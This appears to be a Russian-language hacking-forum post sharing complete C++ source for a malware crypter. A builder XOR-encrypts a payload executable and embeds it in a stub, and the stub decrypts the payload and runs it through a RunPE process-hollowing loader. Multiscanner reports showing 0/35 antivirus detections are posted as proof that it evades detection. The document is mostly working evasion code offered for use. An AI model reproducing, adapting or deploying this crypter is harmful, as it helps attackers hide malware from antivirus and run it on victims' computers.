билдер
Стаб
runpe.h
main
Filename: Stub.exe
Filesize: 309,50 kB
Date: 2016-04-27 08:07:58
MD5: 8a51b89c2da3f4acbac2ad0f68f17a02
SHA1: 3d3165543d782c405eb768e4e34d47608b88a05c
Status: Clean
Rate: 0/35
Details:
Ad-Aware - File is clean
A-Squared - File is clean
Avast - File is clean
AVG Free - File is clean
AntiVir (Avira) - File is clean
BitDefender - File is clean
BullGuard - File is clean
Clam Antivirus - File is clean
COMODO Internet Security - File is clean
Dr.Web - File is clean
ESET NOD32 - File is clean
eTrust-Vet - File is clean
FortiClient - File is clean
F-PROT Antivirus - File is clean
F-Secure Internet Security - File is clean
G Data - File is clean
IKARUS Security - File is clean
K7 Ultimate - File is clean
Kaspersky Antivirus - File is clean
McAfee - File is clean
MS Security Essentials - File is clean
NANO Antivirus - File is clean
Norman - File is clean
Norton Antivirus - File is clean
Panda CommandLine - File is clean
Panda Security - File is clean
Quick Heal Antivirus - File is clean
Solo Antivirus - File is clean
Sophos - File is clean
SUPERAntiSpyware - File is clean
Trend Micro Internet Security - File is clean
Twister Antivirus - File is clean
VBA32 Antivirus - File is clean
VIPRE - File is clean
Zoner AntiVirus - File is clean
Scan Result:
Код:
#include <iostream>
#include <Windows.h>
#include <fstream>
#include <vector>
#include <string>
using namespace std;
char * FB;
DWORD fs;
char output[MAX_PATH];
char choice;
DWORD dwBytesWritten = 0;
char name[MAX_PATH];
std::vector<char> file_data;
void RDF()
{
DWORD bt;
cout << "Please enter the Path of the file \nIf the file is in the same folder as the builder\nJust type the file name with an extention\nEG: Malvare.exe\n";
cout << "File Name: ";
cin >> name;
cout << "Enter output name: ";
cin >> output;
CopyFile("stub.exe", output/*L"Crypted.exe"*/, 0);
cout << "\nGetting the HANDLE of the file to be crypted\n";
HANDLE efile = CreateFileA(name, GENERIC_ALL,FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
cout << "Getting the File size\n";
fs = GetFileSize(efile, NULL);
cout << "The File Size is: ";
cout << fs;
cout << " Bytes\n";
cout << "Allocating Memory for the ReadFile function\n";
file_data.resize(fs);
cout << "Reading the file\n";
ReadFile(efile, (LPVOID)(file_data.data()), fs, &bt, NULL);
CloseHandle(efile);
if (fs != bt)
cout << "Error reading file!" << endl;
}
void xor_crypt(const std::string &key, std::vector<char> &data)
{
for (size_t i = 0; i != data.size(); i++)
data[i] ^= key[i % key.size()];
/*ofstream out("After_enc.dat");
for (std::vector<char>::const_iterator it = data.begin(), itEnd = data.end(); it != itEnd; ++it)
out << *it;*/
}
void choose_enc()
{
cout << "\n\nChoose encryption method: " << endl;
cout << "1. N/A" << endl;
cout << "2. Simple XOR" << endl;
cin >> choice;
}
void enc()
{
cout << "Encrypting the Data\n";
switch (choice)
{
case '1':
break;
case '2':
{
/*ofstream myfile("2.dat");
for (std::vector<char>::const_iterator it = file_data.begin(), itEnd = file_data.end(); it != itEnd; ++it)
myfile << *it;*/
xor_crypt("penguin", file_data); //Encrypt it
}
break;
return;
}
}
void WriteToResources(LPTSTR szTargetPE, int id, LPBYTE lpBytes, DWORD dwSize)
{
cout << "Writing Encrypted data to stub's resources\n";
HANDLE hResource = NULL;
hResource = BeginUpdateResource(szTargetPE, FALSE);
//LPVOID lpResLock = LockResource(lpBytes);
UpdateResource(hResource, RT_RCDATA, MAKEINTRESOURCE(id), MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),(LPVOID)lpBytes, dwSize);
EndUpdateResource(hResource, FALSE);
}
int main()
{
std::string key = "penguin";
RDF();
choose_enc();
enc();
file_data.push_back(choice);
cout << fs << endl;
WriteToResources(output, 10, (BYTE *)file_data.data(), file_data.size());
cout << "Your File Got Crypted\n";
system("PAUSE");
}
Стаб
runpe.h
Код:
#include <Windows.h>
#include <TlHelp32.h>
#include <wchar.h>
typedef LONG(WINAPI * NtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);
typedef BOOL(WINAPI * NtSetThreadContext)(HANDLE hThread, PCONTEXT lpContext);
typedef LPVOID(WINAPI * callVirtualAlloc)(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
typedef LPVOID(WINAPI * callVirtualAllocEx)(HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
typedef bool(WINAPI * callReadProcessMemory)(HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesRead);
typedef bool(WINAPI * callWriteProcessMemory)(HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesRead);
typedef HANDLE(WINAPI * callCreateToolhelp32Snapshot)(DWORD dwFlags, DWORD th32ProcessID);
typedef HANDLE(WINAPI * callProcess32First)(HANDLE hSnapshot, LPPROCESSENTRY32 lppe);
typedef HANDLE(WINAPI * callProcess32Next)(HANDLE hSnapshot, LPPROCESSENTRY32 lppe);
void ExecFile(LPSTR szFilePath, LPVOID pFile)
{
PIMAGE_DOS_HEADER IDH;
PIMAGE_NT_HEADERS INH;
PIMAGE_SECTION_HEADER ISH;
PROCESS_INFORMATION PI;
STARTUPINFOA SI;
PCONTEXT CTX;
PDWORD dwImageBase;
NtUnmapViewOfSection xNtUnmapViewOfSection;
NtSetThreadContext xNtSetThreadContext;
callReadProcessMemory xReadProcessMemory;
callWriteProcessMemory xWriteProcessMemory;
callVirtualAlloc xVirtualAlloc;
callVirtualAllocEx xVirtualAllocEx;
LPVOID pImageBase;
int Count;
IDH = PIMAGE_DOS_HEADER(pFile);
if (IDH->e_magic == IMAGE_DOS_SIGNATURE)
{
INH = PIMAGE_NT_HEADERS(DWORD(pFile) + IDH->e_lfanew);
if (INH->Signature == IMAGE_NT_SIGNATURE)
{
RtlZeroMemory(&SI, sizeof(SI));
RtlZeroMemory(&PI, sizeof(PI));
if (CreateProcessA(szFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &SI, &PI))
{
xVirtualAlloc = callVirtualAlloc(GetProcAddress(GetModuleHandleA("kernel32.dll"), "VirtualAlloc"));
xVirtualAllocEx = callVirtualAllocEx(GetProcAddress(GetModuleHandleA("kernel32.dll"), "VirtualAllocEx"));
xReadProcessMemory = callReadProcessMemory(GetProcAddress(GetModuleHandleA("kernel32.dll"), "ReadProcessMemory"));
xWriteProcessMemory = callReadProcessMemory(GetProcAddress(GetModuleHandleA("kernel32.dll"), "WriteProcessMemory"));
CTX = PCONTEXT(xVirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));
CTX->ContextFlags = CONTEXT_FULL;
if (GetThreadContext(PI.hThread, LPCONTEXT(CTX)))
{
xReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&dwImageBase), 4, NULL);
if (DWORD(dwImageBase) == INH->OptionalHeader.ImageBase)
{
xNtUnmapViewOfSection = NtUnmapViewOfSection(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection"));
xNtUnmapViewOfSection(PI.hProcess, PVOID(dwImageBase));
}
pImageBase = xVirtualAllocEx(PI.hProcess, LPVOID(INH->OptionalHeader.ImageBase), INH->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);
if (pImageBase)
{
xWriteProcessMemory(PI.hProcess, pImageBase, pFile, INH->OptionalHeader.SizeOfHeaders, NULL);
for (Count = 0; Count < INH->FileHeader.NumberOfSections; Count++)
{
ISH = PIMAGE_SECTION_HEADER(DWORD(pFile) + IDH->e_lfanew + 248 + (Count * 40));
xWriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + ISH->VirtualAddress), LPVOID(DWORD(pFile) + ISH->PointerToRawData), ISH->SizeOfRawData, NULL);
}
xWriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&INH->OptionalHeader.ImageBase), 4, NULL);
CTX->Eax = DWORD(pImageBase) + INH->OptionalHeader.AddressOfEntryPoint;
xNtSetThreadContext = NtSetThreadContext(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtSetContextThread"));
xNtSetThreadContext(PI.hThread, LPCONTEXT(CTX));
ResumeThread(PI.hThread);
}
}
}
}
}
VirtualFree(pFile, 0, MEM_RELEASE);
}
main
Код:
#include <iostream>
#include <Windows.h>
#include <fstream>
#include "Runpe.h"
#include <vector>
#include <string>
using namespace std;
int Rsize;
std::vector<char> RData;
void Resource(int id)
{
size_t Rsize;
HRSRC hResource = FindResource(NULL, MAKEINTRESOURCE(id), RT_RCDATA);
HGLOBAL temp = LoadResource(NULL, hResource);
Rsize = SizeofResource(NULL, hResource);
RData.resize(Rsize);
memcpy((void*)RData.data(), temp, Rsize); // replace &RData[0] with RData.data() if C++11
}
void xor_crypt(const std::string &key, std::vector<char> &data)
{
for (size_t i = 0; i != data.size(); i++)
data[i] ^= key[i % key.size()];
}
void enc()
{
switch (RData.back())
{
case '1':
{
std::ofstream out("1.txt");
}
break;
case '2':
{
xor_crypt("penguin", RData);
}
break;
}
return;
}
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
Resource(10);
enc();
LPVOID pFile;
TCHAR szFilePath[1024];
pFile = RData.data();
if (pFile)
{
GetModuleFileNameA(0, LPSTR(szFilePath), 1024);
ExecFile(LPSTR(szFilePath), pFile);
}
return 0;
};
Filename: Stub.exe
Filesize: 309,50 kB
Date: 2016-04-27 08:07:58
MD5: 8a51b89c2da3f4acbac2ad0f68f17a02
SHA1: 3d3165543d782c405eb768e4e34d47608b88a05c
Status: Clean
Rate: 0/35
Details:
Ad-Aware - File is clean
A-Squared - File is clean
Avast - File is clean
AVG Free - File is clean
AntiVir (Avira) - File is clean
BitDefender - File is clean
BullGuard - File is clean
Clam Antivirus - File is clean
COMODO Internet Security - File is clean
Dr.Web - File is clean
ESET NOD32 - File is clean
eTrust-Vet - File is clean
FortiClient - File is clean
F-PROT Antivirus - File is clean
F-Secure Internet Security - File is clean
G Data - File is clean
IKARUS Security - File is clean
K7 Ultimate - File is clean
Kaspersky Antivirus - File is clean
McAfee - File is clean
MS Security Essentials - File is clean
NANO Antivirus - File is clean
Norman - File is clean
Norton Antivirus - File is clean
Panda CommandLine - File is clean
Panda Security - File is clean
Quick Heal Antivirus - File is clean
Solo Antivirus - File is clean
Sophos - File is clean
SUPERAntiSpyware - File is clean
Trend Micro Internet Security - File is clean
Twister Antivirus - File is clean
VBA32 Antivirus - File is clean
VIPRE - File is clean
Zoner AntiVirus - File is clean
Scan Result:
Вы должны зарегистрироваться, чтобы увидеть внешние ссылки
Вы должны зарегистрироваться, чтобы увидеть внешние ссылки
Последнее редактирование: